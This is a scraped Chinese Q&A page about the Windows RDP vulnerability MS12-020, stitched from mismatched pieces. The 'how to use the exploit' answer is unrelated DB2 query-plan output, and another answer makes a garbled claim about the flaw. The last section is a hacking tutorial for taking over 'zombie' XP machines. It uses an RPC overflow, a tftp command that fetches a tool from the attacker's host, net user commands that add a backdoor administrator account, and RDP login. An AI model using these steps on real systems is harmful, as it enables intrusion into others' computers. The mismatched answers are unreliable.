ms12 020（MS12-020的EXP怎么使用）

本文目录

• MS12-020的EXP怎么使用
• 微软漏洞MS12-020的数字含义是什么
• xp系统3389端口ms12-020漏洞，需更新什么补丁

MS12-020的EXP怎么使用

如果希望查看某条SQL语句的存取计划，可以在命令中心中得到；如果希望查看在某一个程序包中SQL语句存取计划，可以使用db2expln工具得到。举个例子，对于数据库SAMPLE中程序包DB2INST1.P0203450，使用下面命令：db2expln -d SAMPLE -g -c db2inst1 -p P0203450 -s 0 -t其中-g 是指给出存取计划的图形输出(用字符模拟的)-s 0 是指分析所有的SQL命令下面是相应的输出：DB2 Universal Database Version 7.2, 5622-044 (c) Copyright IBM Corp. 1991, 2001Licensed Material - Program Property of IBMIBM DATABASE 2 SQL Explain ToolProcessing package DB2INST1.P0203450.******************** PACKAGE *********************Package color=#f0f0f0》--------Prep Date = 2002/12/17--------Prep Time = 16:02:04--------Bind Timestamp = 2002-12-17-16.02.04.373971--------Isolation Level ---------= Cursor Stability--------Blocking---------------- = Block Unambiguous Cursors--------Query Optimization--------Partition Parallel ------= No--------Intra-Partition Parallel = No--------Function Path----------- = "SYSIBM", "SYSFUN", "DB2INST1"Processing Section 1.-------------------- SECTION ----------------------......-------------------- SECTION ----------------------Section = 2SQL Statement:update STAFF set whereEstimated Cost = 75Estimated Cardinality = 2Access Table #Columns = 2| Relation Scan| | Prefetch: Eligible| Lock Intents| | Table: Intent Exclusive| | Row : Update| Sargable Predicate(s)| | #Predicates = 1Update: TableEnd of sectionOptimizer Plan:------UPDATE ------( -2) ------/-- \

微软漏洞MS12-020的数字含义是什么

摘要你好微软漏洞MS12-020全称Microsoft Windows远程桌面协议RDP远程代码执行漏洞，可导致BSOD（死亡蓝屏）

咨询记录 · 回答于2021-11-05

微软漏洞MS12-020的数字含义是什么？

你好微软漏洞MS12-020全称Microsoft Windows远程桌面协议RDP远程代码执行漏洞，可导致BSOD（死亡蓝屏）

这种漏洞危害可是特别大的，可以无限的去复制应用，导致应用内的信息泄露出去所以发现应用更新了不要不理会，一定要及时的去更新

希望我的回答可以帮到你哦，觉得可以的话，给个赞吧，祝你生活愉快

xp系统3389端口ms12-020漏洞，需更新什么补丁

一直似乎是牢不可破的。以前也有过一些关于windows xp的溢出但是基本没人成功过。一直到了最近闹的沸沸扬扬的Microsoft RPC接口远程任意代码可执行漏洞才打破了这个神话。但是对于windows xp这个系统我个人认为安全系数还是比较高的。推荐个人使用。今天我主要要为大家讲的是windows xp的Terminal Services服务。该服务使用的端口是tcp 3389端口。所以开Terminal Services服务的肉鸡大家就习惯管他叫3389鸡。想必大家都玩过win2k的3389吧?但是我最近去了一些论坛有很多人说windows xp的Terminal Services和windows 2000的是一样的。具我的多次实验发现windows xp的3389和windows 2000的3389根本不是一样的而且差的很多。下面我就为大家详细讲解一下windows xp的3389。首先要想清楚看见windows xp的3389就要先开启windows xp的3389。我在网上发现了一个针对开启windows xp3389的小工具。具我多次实验100%可以成功。该工具的名字为xp3389.exe而且使用也非常简便。直接上传到肉鸡上执行就可以了。由于xp的ipc$默认只是guest权限。用ipc$的思路上传文件是绝对错误的。我归纳出上传文件的方法有两种:1 利用tftp上传(tftp大家都很熟悉吧?以前提到过N次在这里我就不详细说了)2 利用ftp来上传首先我先用时下比较前卫的漏洞135端口的rpc漏洞溢出一台windows xp主机详细看下图:OK。一举成功。拿到了一个system权限的shell.然后用tftp上传xp3389.exe命令为tftp –I ip get xp3389.exe看下图:OK上传完毕。然后直接在肉鸡执行就可以了。看下图:执行完毕以后就成功开启了3389服务。(该程序最大的好处就是执行以后不需要肉鸡重新启动就可以直接登陆。)对了还有一个问题我要先象大家交代要想登陆xp的3389必须要使用系统没占用的帐号。也就是现在没有正被使用的帐号权限必须还需要是administrators组的。Guest组是不可以的。我在肉鸡又执行了两条命令分别是:Net user zihuan ziHUAN /addNet localgroup administrators zihuan /add相信大家都能看懂我在肉鸡上建立了一个管理员权限的用户为:zihuan密码为:ziHUAN。建立好以后直接用远程桌面连接登陆看下图:然后输入刚才建立的用户和密码登陆看下图:OK一个完美的xp桌面。是不是非常爽啊?不过你先别高兴。我说了xp的3389和win2k的不一样。不一样的地方有几下几点:1 你登陆上xp的3389以后该主机原来正在登陆的帐号会自动注销，也就是说xp只支持一个用户登陆。你登陆上去以后漏洞主机的主人就会掉下来:)如果肉鸡的主人发现他掉了下来在登陆的话你就会掉下来:)2 在你登陆上xp3389肉鸡的主人会收到一条信息。但是如果你动作足够快的话……嘿嘿。3 登陆上xp3389会把远程的主机的声音带到本地。你可不要害怕哦。解决的办法是把远程桌面连接的远程计算机声音选到留在远程主机看下图:以上就是针对xp3389的一些思路。希望对光大黑迷以后hacking的时候能有所帮助。根据我测试还发现xp3389.exe还可以开启windows server 2003的3389由于篇幅原因我在这里就不给大家多介绍了。xp3389.exe可以开启xp的终端。传到肉鸡上直接运行即可。不需要重新启动。